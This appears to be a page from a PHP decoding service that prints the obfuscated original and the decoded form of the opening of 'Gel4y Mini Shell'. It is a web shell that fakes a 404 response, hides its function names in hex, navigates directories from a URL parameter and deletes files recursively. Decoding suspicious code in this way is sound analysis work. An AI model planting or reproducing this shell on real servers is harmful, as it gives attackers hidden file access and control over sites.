Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php error_reporting(0); http_response_code(404); define("self", "G\x65l\64y M\x69n\x6..

Decoded Output download

<?php 
error_reporting(0); 
http_response_code(404); 
define("self", "Gel4y Mini Shell"); 
$scD = "scandir"; 
$fc = array("7068705f756e616d65", "70687076657273696f6e", "676574637764", "6368646972", "707265675f73706c6974", "61727261795f64696666", "69735f646972", "69735f66696c65", "69735f7772697461626c65", "69735f7265616461626c65", "66696c6573697a65", "636f7079", "66696c655f657869737473", "66696c655f7075745f636f6e74656e7473", "66696c655f6765745f636f6e74656e7473", "6d6b646972", "72656e616d65", "737472746f74696d65", "68746d6c7370656369616c6368617273", "64617465", "66696c656d74696d65"); 
for ($i = 0; $i < count($fc); $i++) 
	$fc[$i] = nhx($fc[$i]); 
if (isset($_GET["p"])) { 
	$p = nhx($_GET["p"]); 
	$fc[3](nhx($_GET["p"])); 
} else { 
	$p = $fc[2](); 
} 
function hex($str) { 
	$r = ""; 
	for ($i = 0; $i < strlen($str); $i++) 
		$r .= dechex(ord($str[$i])); 
	return $r; 
} 
function nhx($str) { 
	$r = ""; 
	$len = (strlen($str) -1); 
	for ($i = 0; $i < $len; $i += 2) 
		$r .= chr(hexdec($str[$i].$str[$i+1])); 
	return $r; 
} 
function perms($f) { 
	$p = fileperms($f); 
	if (($p & 0xC000) == 0xC000) $i = 's'; 
	elseif (($p & 0xA000) == 0xA000) $i = 'l'; 
	elseif (($p & 0x8000) == 0x8000) $i = '-'; 
	elseif (($p & 0x6000) == 0x6000) $i = 'b'; 
	elseif (($p & 0x4000) == 0x4000) $i = 'd'; 
	elseif (($p & 0x2000) == 0x2000) $i = 'c'; 
	elseif (($p & 0x1000) == 0x1000) $i = 'p'; 
	else $i = 'u'; 
 
	$i .= (($p & 0x0100) ? 'r' : '-'); 
	$i .= (($p & 0x0080) ? 'w' : '-'); 
	$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x') : (($p & 0x0800) ? 'S' : '-')); 
	$i .= (($p & 0x0020) ? 'r' : '-'); 
	$i .= (($p & 0x0010) ? 'w' : '-'); 
	$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x') : (($p & 0x0400) ? 'S' : '-')); 
	$i .= (($p & 0x0004) ? 'r' : '-'); 
	$i .= (($p & 0x0002) ? 'w' : '-'); 
	$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x') : (($p & 0x0200) ? 'T' : '-')); 
	return $i; 
} 
function a($msg, $sts = 1, $loc = "") { 
	global $p; 
	$status = (($sts == 1) ? "success" : "error"); 
	echo "<script>swal({title: \"{$status}\", text: \"{$msg}\", icon: \"{$status}\"}).then((btnClick) => {if(btnClick){document.location.href=\"?p=".hex($p).$loc."\"}})</script>"; 
} 
function deldir($d) { 
	global $fc; 
	if (trim(pathinfo($d, PATHINFO_BASENAME), '.') === '') return; 
	if ($fc[6]($d)) { 
		array_map("deldir", glob($d . DIRECTORY_SEPARATOR . '{,.}*', GLOB_BRACE | GLOB_NOSORT)); 
		rmdir($d); 
	} else { 
		unlink($d); 
	} 
} 
?>

Did this file decode correctly?

Original Code

<?php
error_reporting(0);
http_response_code(404);
define("self", "G\x65l\64y M\x69n\x69 Sh\x65ll");
$scD = "s\x63\x61\x6e\x64\x69r";
$fc = array("7068705f756e616d65", "70687076657273696f6e", "676574637764", "6368646972", "707265675f73706c6974", "61727261795f64696666", "69735f646972", "69735f66696c65", "69735f7772697461626c65", "69735f7265616461626c65", "66696c6573697a65", "636f7079", "66696c655f657869737473", "66696c655f7075745f636f6e74656e7473", "66696c655f6765745f636f6e74656e7473", "6d6b646972", "72656e616d65", "737472746f74696d65", "68746d6c7370656369616c6368617273", "64617465", "66696c656d74696d65");
for ($i = 0; $i < count($fc); $i++)
	$fc[$i] = nhx($fc[$i]);
if (isset($_GET["p"])) {
	$p = nhx($_GET["p"]);
	$fc[3](nhx($_GET["p"]));
} else {
	$p = $fc[2]();
}
function hex($str) {
	$r = "";
	for ($i = 0; $i < strlen($str); $i++)
		$r .= dechex(ord($str[$i]));
	return $r;
}
function nhx($str) {
	$r = "";
	$len = (strlen($str) -1);
	for ($i = 0; $i < $len; $i += 2)
		$r .= chr(hexdec($str[$i].$str[$i+1]));
	return $r;
}
function perms($f) {
	$p = fileperms($f);
	if (($p & 0xC000) == 0xC000) $i = 's';
	elseif (($p & 0xA000) == 0xA000) $i = 'l';
	elseif (($p & 0x8000) == 0x8000) $i = '-';
	elseif (($p & 0x6000) == 0x6000) $i = 'b';
	elseif (($p & 0x4000) == 0x4000) $i = 'd';
	elseif (($p & 0x2000) == 0x2000) $i = 'c';
	elseif (($p & 0x1000) == 0x1000) $i = 'p';
	else $i = 'u';

	$i .= (($p & 0x0100) ? 'r' : '-');
	$i .= (($p & 0x0080) ? 'w' : '-');
	$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x') : (($p & 0x0800) ? 'S' : '-'));
	$i .= (($p & 0x0020) ? 'r' : '-');
	$i .= (($p & 0x0010) ? 'w' : '-');
	$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x') : (($p & 0x0400) ? 'S' : '-'));
	$i .= (($p & 0x0004) ? 'r' : '-');
	$i .= (($p & 0x0002) ? 'w' : '-');
	$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x') : (($p & 0x0200) ? 'T' : '-'));
	return $i;
}
function a($msg, $sts = 1, $loc = "") {
	global $p;
	$status = (($sts == 1) ? "success" : "error");
	echo "<script>swal({title: \"{$status}\", text: \"{$msg}\", icon: \"{$status}\"}).then((btnClick) => {if(btnClick){document.location.href=\"?p=".hex($p).$loc."\"}})</script>";
}
function deldir($d) {
	global $fc;
	if (trim(pathinfo($d, PATHINFO_BASENAME), '.') === '') return;
	if ($fc[6]($d)) {
		array_map("deldir", glob($d . DIRECTORY_SEPARATOR . '{,.}*', GLOB_BRACE | GLOB_NOSORT));
		rmdir($d);
	} else {
		unlink($d);
	}
}
?>

Function Calls

error_reporting 1
http_response_code 1

Variables

None

Stats

MD5 07f156ea31442c72b40cbe0c03c38811
Eval Count 0
Decode Time 51 ms